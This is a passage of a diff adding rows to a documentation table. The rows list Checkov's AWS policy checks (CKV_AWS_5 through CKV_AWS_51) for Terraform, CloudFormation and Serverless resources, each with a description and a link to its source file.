stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | +| 159 | CKV_AWS_5 | resource | AWS::Elasticsearch::Domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Cloudformation | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py) | +| 160 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 161 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | +| 162 | CKV_AWS_6 | resource | AWS::Elasticsearch::Domain | Ensure all Elasticsearch has node-to-node encryption enabled | Cloudformation | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 163 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 164 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | +| 165 | 
CKV_AWS_7 | resource | AWS::KMS::Key | Ensure rotation for customer created CMKs is enabled | Cloudformation | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py) | +| 166 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | +| 167 | CKV_AWS_8 | resource | AWS::AutoScaling::LaunchConfiguration | Ensure all data stored in the Launch configuration EBS is securely encrypted | Cloudformation | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 168 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 169 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | +| 170 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | +| 171 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | 
[PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | +| 172 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | +| 173 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | +| 174 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | +| 175 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | +| 176 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | +| 177 | CKV_AWS_16 | resource | AWS::RDS::DBInstance | Ensure all data stored in the RDS is securely encrypted at rest | Cloudformation | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py) | +| 178 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | 
[RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | +| 179 | CKV_AWS_17 | resource | AWS::RDS::DBInstance | Ensure all data stored in RDS is not publicly accessible | Cloudformation | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py) | +| 180 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 181 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | +| 182 | CKV_AWS_18 | resource | AWS::S3::Bucket | Ensure the S3 bucket has access logging enabled | Cloudformation | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py) | +| 183 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | +| 184 | CKV_AWS_19 | resource | AWS::S3::Bucket | Ensure the S3 bucket has server-side-encryption enabled | Cloudformation | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py) | +| 185 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | +| 186 | CKV_AWS_19 | 
resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) |
+| 187 | CKV_AWS_20 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow READ permissions to everyone | Cloudformation | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py) |
+| 188 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) |
+| 189 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) |
+| 190 | CKV_AWS_21 | resource | AWS::S3::Bucket | Ensure the S3 bucket has versioning enabled | Cloudformation | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py) |
+| 191 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) |
+| 192 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) |
+| 193 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) |
+| 194 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroup | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 195 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupEgress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 196 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupIngress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 197 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 198 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 199 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 200 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 201 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 202 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 203 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
+| 204 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 205 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 206 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 207 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 208 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
+| 209 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 210 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 211 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 212 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 213 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
+| 214 | CKV_AWS_26 | resource | AWS::SNS::Topic | Ensure all data stored in the SNS topic is encrypted | Cloudformation | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py) |
+| 215 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) |
+| 216 | CKV_AWS_27 | resource | AWS::SQS::Queue | Ensure all data stored in the SQS queue is encrypted | Cloudformation | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py) |
+| 217 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) |
+| 218 | CKV_AWS_28 | resource | AWS::DynamoDB::Table | Ensure DynamoDB point in time recovery (backup) is enabled | Cloudformation | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py) |
+| 219 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) |
+| 220 | CKV_AWS_29 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Cloudformation | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) |
+| 221 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) |
+| 222 | CKV_AWS_30 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) |
+| 223 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) |
+| 224 | CKV_AWS_31 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
+| 225 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) |
+| 226 | CKV_AWS_32 | resource | AWS::ECR::Repository | Ensure ECR policy is not set to public | Cloudformation | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py) |
+| 227 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) |
+| 228 | CKV_AWS_33 | resource | AWS::KMS::Key | Ensure KMS key policy does not contain wildcard (*) principal | Cloudformation | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py) |
+| 229 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) |
+| 230 | CKV_AWS_34 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS | Cloudformation | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py) |
+| 231 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) |
+| 232 | CKV_AWS_35 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Cloudformation | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py) |
+| 233 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) |
+| 234 | CKV_AWS_36 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail log file validation is enabled | Cloudformation | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py) |
+| 235 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) |
+| 236 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) |
+| 237 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) |
+| 238 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) |
+| 239 | CKV_AWS_40 | resource | AWS::IAM::Policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Cloudformation | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 240 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 241 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 242 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) |
+| 243 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) |
+| 244 | CKV_AWS_41 | resource | serverless_aws | Ensure no hard coded AWS access key and secret key exists in provider | serverless | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py) |
+| 245 | CKV_AWS_42 | resource | AWS::EFS::FileSystem | Ensure EFS is securely encrypted | Cloudformation | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py) |
+| 246 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) |
+| 247 | CKV_AWS_43 | resource | AWS::Kinesis::Stream | Ensure Kinesis Stream is securely encrypted | Cloudformation | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py) |
+| 248 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) |
+| 249 | CKV_AWS_44 | resource | AWS::Neptune::DBCluster | Ensure Neptune storage is securely encrypted | Cloudformation | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
+| 250 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
+| 251 | CKV_AWS_45 | resource | AWS::Lambda::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 252 | CKV_AWS_45 | resource | AWS::Serverless::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 253 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) |
+| 254 | CKV_AWS_46 | resource | AWS::EC2::Instance | Ensure no hard-coded secrets exist in EC2 user data | Cloudformation | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py) |
+| 255 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 256 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 257 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
+| 258 | CKV_AWS_47 | resource | AWS::DAX::Cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Cloudformation | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py) |
+| 259 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) |
+| 260 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) |
+| 261 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) |
+| 262 | CKV_AWS_49 | resource | serverless_aws | Ensure no IAM policies documents allow "*" as a statement's actions | serverless | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py) |
+| 263 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) |
+| 264 | CKV_AWS_51 | resource | AWS::ECR::Repository | Ensure ECR Image Tags are immutable | Cloudformation | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py) |
+| 265 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) |
